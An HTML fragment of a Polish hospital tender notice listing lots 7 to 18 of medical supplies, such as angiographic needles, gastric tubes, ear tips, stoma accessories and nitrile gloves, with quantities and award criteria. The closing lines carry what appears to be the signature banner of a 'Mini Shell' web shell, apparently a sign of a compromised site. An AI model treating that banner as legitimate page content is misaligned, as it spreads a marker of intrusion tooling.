<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Igły angiograficzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igła angiograficzna, dwuczęściowa ze skrzydełkami o średnicy wewnętrznej 0,021; 0,032; 0,035; 0,038 długość 3,8cm; 5cm; 7cm	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. jakość - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zgłebniki żołądkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zgłębniki żołądkowe o dł. 75-90 cm nr 12,14,16,18,20 (rozmiar do wyboru), (cieniujące w RTG, skalowane, nie dające reakcji alergicznych, zakończone oliwką, bezpieczne w czasie zakładania, nie uszkadzające śluzówek, z otworami bocznymi i zatyczką, rozmiar kodowany kolorystycznie), sterylne	szt.	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. jakość - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przewody do pompki perystaltycznej mikrowiertarki usznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Komplet przewodów do jednego napędu do pompki perystaltycznej mikrowiertarki usznej Power Instrument Driver Model REF 5400 -50 seria 0904104483	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Elektrody do śródoperacyjnego monitoringu elektrofizjologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Para elektrod igłowych (długość igły 20mm, długość przewodu 1,2m), wtyczka touchproof 1,5mm czerwono-czarna, produkt sterylny, jednorazowy, para elektrod sterylnie pakowana	para 	30
2.Para elektrod igłowych (długość igły 12mm, długość przewodu 2m), wtyczka touchproof 1,5mm czerwono-czarna, produkt sterylny, jednorazowy, para elektrod sterylnie pakowana	para 	10
3.Elektroda igłowa (długość 15mm, długość przewodu 25cm) wtyczka 1,0mm czarna, produkt sterylny, sterylnie pakowana sztuka	sztuka	20
4.Elektroda igłowa (długość 15mm, długość przewodu 25cm) wtyczka 1,0mm czerwona, produkt sterylny, jednorazowy, sterylnie pakowana sztuka	sztuka	20
5.Elektroda igłowa (długość 15mm, długość przewodu 25cm) wtyczka 1,0mm biała, produkt sterylny, jednorazowy, sterylnie pakowana sztuka	sztuka	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Wkładki uszne do badania słuchu metodą BERA do aparatu Interakustic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wkładki uszne typ INFANT-rozmiar 4 mm (badanie BERA)	szt.	80
2.Wkładki uszne typ INFANT-rozmiar 3,5 mm (badanie BERA)	szt.	80
3.Wkładki uszne typ choinkowe  rozmiar 3-5 mm dla niemowląt (badanie komputerowe-OTOEMISJA)	szt.	100
4.Wkładki uszne typ korkowe rozmiar  6mm pediatryczne (OTOEMISJA)	szt.	80
5.Wkładki uszne typ gąbczaste rozmiar  10mm dla dzieci starszych (OTOEMISJA)	szt.	150
6.Wkładki uszne typ gąbczaste rozmiar  13mm dla dorosłych	szt.	50
7.Wkładki uszne typ gąbczaste rozmiar  18mm b.duże	szt.	50
8.Zestaw wkładek usznych do aparatu OTO-READ OAE Disposoble Edrtips/Einweg-Ohrstopsel (rozmiary: 3mm,4mm,6mm,7mm,8mm,9mm,10mm,11mm,12mm,13mm)	op.	1
9.Końcówka do sondy zewnętrznej do przesiewowego badania słuchu aparatem EROSCAN	szt.	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wkładki uszne do badań słuchu aparatem Biologic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wkładki uszne gąbczaste O rozmiar 10 mm	szt.	100
2.Wkładki uszne koronkowe O rozmiar 6 mm	szt.	100
3.Wkładki uszne choinkowe O rozmiar 3-5 mm	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Szczypce biopsyjne do kolonoskopii i gastroskopii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szczypce biopsyjne do kolonoskopii owalne z okienkiem kolcem parametry 2,8mm/2300mm	szt.2 wielorazowe
2.Szczypce biopsyjne do gastroskopii owalne z okienkiem kolcem parametry 2,8mm/1550mm	szt.2 wielorazowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Elektrody samoprzylepne do aparatu Dura-Stick Tens.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Elektrody samoprzylepne Dura - Stick TENS w komplecie elektroda o wymiarach: 1)2,25cmx2,50cm 2)5,70cmx6,30cm (w opakowaniu po 2szt. z każdego rodzaju)	op.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Akcesoria do stomii pediatrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pasta gojąca w paskach, przylegająca do wilgotnych powierzchni, tworząca środowisko sprzyjające gojeniu   i chroniąca skórę przed uszkodzeniem                            op = 10 szt	op	4
2.Pasta gojąca w tubie, przylegająca do wilgotnych powierzchni, tworząca środowisko sprzyjające gojeniu   i chroniąca skórę przed uszkodzeniem                            op = 12 szt  	op	1
3.Krem przeciw odparzeniom do skóry wokół stomii         op = 6 szt	op	1
4.Płytka stomijna - ochronna, wielkość 15 cmx15cm,         stosowana w celu ochrony skóry w przypadkach , kiedy wydzieliny organizmu powodują jej uszkodzenie  op = 5 szt	op	2
5.Płytka stomijna - ochronna, wielkość 20 cmx20cm, stosowana w celu ochrony skóry       w przypadkach , kiedy wydzieliny organizmu powodują jej uszkodzenie  op = 5 szt	op	1
6.Płytka stomijna pediatryczna, wielkość 17 mm bez otworu (otwór do wycięcia)                                                  op = 10 szt	op	20
7.Worek stomijny pediatryczny , otwarty, przezroczysty lub z nadrukiem, dwuczęściowy z zamknięciem na rzepy,  wielkość 17 mm                                                                     op = 30szt	op	15
8.Płytka stomijna pediatryczna do stomii wklęsłych , wielkość 40 mm                                                                    op = 5 szt	op	6
9.Worek stomijny pediatryczny , otwarty, przezroczysty lub z nadrukiem, dwuczęściowy z zaciskiem do stomii wklęsłych,  wielkość 40 mm                                                op = 30 szt	op	2
10.Płytka stomijna pediatryczna , wielkość 27 mm                                                                    op = 10 szt	op	10
11.Worek stomijny pediatryczny , otwarty, przezroczysty lub z nadrukiem, dwuczęściowy    z zamknięciem na rzepy,  rozmiar łączenia  27 mm                                                op = 30 szt	op	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. jakość - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Kołnierze ortopedyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kołnierze ortopedyczne miękkie	
6x30	szt.	10
8x43	szt.	10
8x48	szt.	10
10x43	szt.	10
10x48	szt.	10
10x56	szt.	8
12x48	szt.	8
2.Kołnierze ortopedyczne -urazowe, dwuczęściowe, sztywne	
S	szt.	8
M	szt.	8
L	szt.	8
XL	szt.	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Komora wilgotna do osłony oka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Komory wilgotne zapobiegające wysychaniu gałek ocznych noworodkowe	pary	20
2.Komory wilgotne zapobiegające wysychaniu gałek ocznych pediatryczne	pary	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Rękawice z nitrylu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rękawice diagnostyczne nitrylowe o długości minimum 300mm - stanowiące ochronę przed mikroorganizmami i chemikaliami( opakowanie 100 sztuk). Dostępne w rozmiarach S.M, L	op. 	480.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. jakość - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com